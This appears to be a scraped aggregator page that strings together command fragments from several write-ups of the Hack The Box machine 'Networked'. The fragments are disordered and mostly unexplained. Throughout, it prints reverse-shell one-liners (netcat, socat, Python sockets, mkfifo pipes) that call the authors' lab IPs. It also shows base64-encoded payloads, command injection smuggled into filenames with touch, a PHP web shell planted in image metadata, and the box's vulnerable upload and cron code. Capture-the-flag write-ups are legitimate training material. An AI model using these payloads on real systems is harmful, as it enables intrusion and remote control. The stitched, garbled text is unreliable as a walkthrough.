networked.htbwriteup.com
54.84.236.175
Public Scan
URL:
https://networked.htbwriteup.com/
Submission: On January 26 via api from US — Scanned from US
Form analysis
0 forms found in the DOM
Text Content
NETWORKED WRITEUP & WALKTHROUGH For now this is a list of commands by various authors. The PHP and shell fragments that recur below are the box's three weak points: an upload check that trusts the MIME type and the filename suffix, a scheduled script (check_attack.php) that passes upload filenames to exec() without escapeshellarg(), and a sudo-permitted script (changename.sh) that writes unquoted user input into an ifcfg file. 0xdf [writeup] 2953,067 Omniscient nmap -p- --min-rate 10000 -oA scans/nmap-alltcp 10.10.10.146 nmap -p 80,22,443 -sV -sC -oA scans/nmap-tcpscripts 10.10.10.146 tar xvf backup.tar tar xvf backup.tar 26 if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { php -a php > $filename="image.png"; php > $pieces = explode('.',$filename); print_r($pieces); php > $name= array_shift($pieces); echo $name; php > $name = str_replace('_','.',$name); echo $name; php > $ext = implode('.',$pieces); echo $ext; php > $filename="image.php.png"; php > $pieces = explode('.',$filename); print_r($pieces); php > $name= array_shift($pieces); echo $name; php > $name = str_replace('_','.',$name); echo $name; php > $ext = implode('.',$pieces); echo $ext; file shell.png nc -lnvp 443 bash-4.2$ ls -l php /home/guly/check_attack.php if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); ls -a php > $files = preg_grep('/^([^.])/', scandir('.')); print_r($files); nc -e sh 10.10.14.7 443 bash-4.2$ nc -e sh 10.10.14.7 443 nc -lnvp 443 echo nc -e /bin/bash 10.10.14.7 443 | base64 -w0 bash-4.2$ echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh nc -lnvp 443 bash-4.2$ touch '/var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b' a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); exec("nohup /bin/rm -f /var/www/html/uploads/a; echo bmMgLWUgL2Jpbi9iYXNoIDEwLjEwLjE0LjcgNDQzCg== | base64 -d | sh; b > /dev/null 2>&1 &"); nc -lnvp 443 sudo -l [guly@networked ~]$ sudo -l sudo -l !/bin/bash -p cat > 
/etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly sudo /usr/local/sbin/changename.sh cat /etc/sysconfig/network-scripts/ifcfg-guly command not found 0xRick [writeup] 89146 Omniscient root@kali:~/Desktop/HTB/boxes/networked# nmap -sV -sT -sC -o nmapinitial networked.htb root@kali:~/Desktop/HTB/boxes/networked# gobuster -u http://networked.htb/ -w /usr/share/wordlists/dirb/common.txt backup.tar 100%[=====================================================================================================================>] 10.00K --.-KB/s in 0.1s root@kali:~/Desktop/HTB/boxes/networked/backup# ls -la #echo "name $name - ext $ext\n"; return array($name,$ext); return array($name,$ext); //echo "prefix: $prefix - fname: $filename\n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; echo ' '."\n"; if (in_array($file, $ignored)) continue; if (!($check[0])) { if ((strpos($exploded[0], '10_10_') === 0) && (!($prefix === $_SERVER["REMOTE_ADDR"])) ) { if ($i == 1) { echo "\n"; echo '\n"; if ($i == 4) { echo "\n"; if ($i < 4 && $i > 1) { echo "\n"; if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== 
UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; root@kali:~/Desktop/HTB/boxes/networked# echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f");' >> ./shell.php.png root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337 which python sh-4.2$ python -c "import pty;pty.spawn('/bin/bash')" python -c "import pty;pty.spawn('/bin/bash')" root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1337 bash-4.2$ ls -al bash-4.2$ ls -al if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); bash-4.2$ touch '; nc 10.10.xx.xx 1338 -c bash' root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338 python -c "import pty;pty.spawn('/bin/bash')" root@kali:~/Desktop/HTB/boxes/networked# stty raw -echo root@kali:~/Desktop/HTB/boxes/networked# nc -lvnp 1338 [guly@networked ~]$ ls -al sudo -l [guly@networked ~]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! 
$x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly test bash [root@networked ~]# ls -la jirbj [writeup] 14521 Guru nmap -sV -p- -T4 10.10.10.146 tar xvf backup.tar cat upload.php if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; nc -nlvp 4444 http://10.10.10.146/uploads/10_10_14_5.php.jpg?cmd=nc 10.10.14.5 4444 -e /bin/bash python -c "import pty;pty.spawn('/bin/bash')" bash-4.2$ ls -la bash-4.2$ ls -la cat crontab.guly if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; nc -nlvp 5555 bash-4.2$ touch "; nc 10.10.14.5 5555 -e bash" bash-4.2$ ls -la bash-4.2$ echo "nc 10.10.14.5 5555 -e /bin/bash" > ./shell.sh python -c "import pty;pty.spawn('/bin/bash')" [guly@networked ~]$ ls -la [guly@networked ~]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! 
$x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly sh-4.2# ls -la luckolen [writeup] 491 Hacker luc@kali:~/HTB/Networked$ nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.10.10.146 luc@kali:~/HTB/Networked$ gobuster dir -u http://10.10.10.146/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; #echo "name $name - ext $ext\n"; return array($name,$ext); return array($name,$ext); //echo "prefix: $prefix - fname: $filename \n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; luc@kali:~/HTB/Networked$ sudo nc -lnvp 443 bash-4.2$ ls -R if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; bash-4.2$ ls -l exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); bash-4.2$ touch '/var/www/html/uploads/; nc 10.10.14.9 444 -c bash' 10_10_14_9.jpg 
10_10_14_9.php.jpg 127_0_0_1.png 127_0_0_2.png 127_0_0_3.png 127_0_0_4.png ; nc 10.10.14.9 444 -c bash index.html luc@kali:~/HTB/Networked$ sudo nc -lnvp 444 cat /home/guly/user.txt [guly@networked ~]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly test bash phaz0n [writeup] 3812 Hacker nmap -sC -sV 10.10.10.146 gobuster dir -u http://10.10.10.146 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -x php if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if (strpos($mime_type, 'image/') === 0) { return true; return false; if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; nc -nlvp 443 nc -nlvp 443 sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")' if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; cd /var/www/html/uploads touch "test.txt" php /home/guly/check_attack.php rm -f /var/www/html/uploads/test.txt exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); bash-4.2$ touch "; nc 10.10.14.27 4444 -e '/bin/bash'" socat file:`tty`,raw,echo=0 tcp-listen:4444 bash-4.2$ touch "; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444" rm -f /var/www/html/uploads/; socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.27:4444 socat file:`tty`,raw,echo=0 tcp-listen:4444 socat 
file:`tty`,raw,echo=0 tcp-listen:4444 sudo -l [guly@networked /]$ sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! $x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly test ps /tmp/foo nc -nlvp 3333 [guly@networked ~]$ echo "nc -e /bin/bash 10.10.14.27 3333" > /tmp/foo ps /tmp/foo nc -nlvp 3333 padraignix [writeup] 3415 Elite Hacker cat upload.php if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file1.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file2"; cat lib.php if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; cat crontab.guly cat check_attack.php if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; sh-4.2$ touch "no; nc -c bash 10.10.xx.xx 31337" touch "no; nc -c bash 10.10.xx.xx 31337" sudo -l cat /usr/local/sbin/changename.sh !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! 
$x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly sudo -u root /usr/local/sbin/changename.sh samirettali [writeup] 458 Pro Hacker nmap -A -T4 10.10.10.146 gobuster dir -q -t 40 -w raft-large-directories.txt -u http://10.10.10.146 gobuster dir -q -t 40 -w raft-large-files.txt -u http://10.10.10.146 tar -xvf backup.tar if (!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; #echo "name $name - ext $ext\n"; return array($name,$ext); return array($name,$ext); //echo "prefix: $prefix - fname: $filename \n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); if (function_exists('finfo_file')) { if (is_resource($finfo)) // It is possible that a FALSE value is returned, if there is no magic MIME database file found on the system if (is_string($mime) && preg_match($regexp, $mime, $matches)) { return $file_type; if (function_exists('mime_content_type')) if (strlen($file_type) > 0) // It's possible that mime_content_type() returns FALSE or an empty string return $file_type; return $file['type']; if (strpos($mime_type, 'image/') === 0) { return true; return false; exiftool -Comment='' hackthebox.png nc -lnvp 1337 nohup /bin/rm -f $path; ls > /dev/null 2>&1 & ; nc 10.10.14.1 1338 - bash touch \;nc\ 10\.10\.14\.4\ 1338\ -c\ bash nc -nlvp 1338 python -c "import pty; pty.spawn('/bin/bash')" [guly@networked ~]$ wc -c user.txt [root@networked network-scripts]# wc -c /root/root.txt nullarmor [writeup] 1026 Pro Hacker gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.146 -t 25 if 
(!empty($_FILES["myFile"])) { if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if ($myFile["error"] !== UPLOAD_ERR_OK) { echo " An error occurred."; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if (!$success) { echo " Unable to save file."; echo " file uploaded, refresh gallery"; exiftool -Comment='' shell.php.jpeg python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.22",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; command injection ;nc -e \$(which bash) 10.10.14.22 4444 touch ";nc -e \$(which bash) 10.10.14.22 4444" sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! 
$x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly borari [writeup] 721 Pro Hacker ssh on tcp/22 wget tar -xvf backup.tar $sock, 1=>$sock, 2=>$sock), $pipes); ?> nc -nvlp 443 ls /home sh-4.2\$ ls -lAh /home/guly ls -lAh /home/guly sh-4.2\$ /usr/bin/script -qc /bin/bash /dev/null /usr/bin/script -qc /bin/bash /dev/null bash-4.2\$ curl -s \| bash /dev/stdin -l 1 if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; //echo "prefix: $prefix - fname: $filename \n"; if (!(filter_var($prefix, FILTER_VALIDATE_IP))) { return array($ret,$msg); sh-4.2\$ ls -lAh ls -lAh sh-4.2\$ touch \-- \'/var/www/html/uploads; nc -c bash 10.10.14.18 445\' sh-4.2\$ ls -lAh ls -lAh nc -nvlp 445 \[guly@networked shm\]\$ sudo -l curl -s \| bash /dev/stdin -l 1 \[guly@networked \~\]\$ export NAME=\'; nc -c 10.10.14.18 443\' ; nc -c 10.10.14.18 443 guy0 nc -c bash 10.10.14.18 443 nc -c bash 10.10.14.18 443 0x3ashry [writeup] gobuster dir -u http://10.10.10.146/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o directory.txt 2>/dev/null tar xvf backup.tar if (!(check_file_type($_FILES["myFile"]) && filesize($_FILES['myFile']['tmp_name']) < 60000)) { echo ' Invalid image file.'; if (substr_compare($myFile["name"], $vext, -strlen($vext)) === 0) { if (!($valid)) { echo " Invalid image file"; if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; rm -f touch "; nc -c bash 10.10.16.10 5555" sudo -l !/bin/bash -p cat > /etc/sysconfig/network-scripts/ifcfg-guly << EoF for var in NAME PROXY_METHOD BROWSER_ONLY BOOTPROTO; do echo "interface $var:" read x while [[ ! 
$x =~ $regexp ]]; do echo "wrong input, try again" echo "interface $var:" read x echo $var=$x >> /etc/sysconfig/network-scripts/ifcfg-guly Hilbert [writeup] gobuster dir -w -x .php,.txt -o -u http://10.10.10.146 exiftool -DocumentName="';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '';} __halt_compiler();?>" hilbert.jpg root@kali:~/HTB/Boxes/Networked# nc -nlvp 1234 if ($value == 'index.html') { if (!($check[0])) { echo "attack!\n"; exec("rm -f $logpath"); exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); echo "rm -f $path$value\n"; exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &"); sh-4.2$ touch ";nc 10.10.14.3 1235 -c bash" root@kali:~/HTB/Boxes/Networked# nc -nlvp 1235 Not affiliated with Hack The Box. '; echo "uploaded by $check[1]"; echo ""; echo "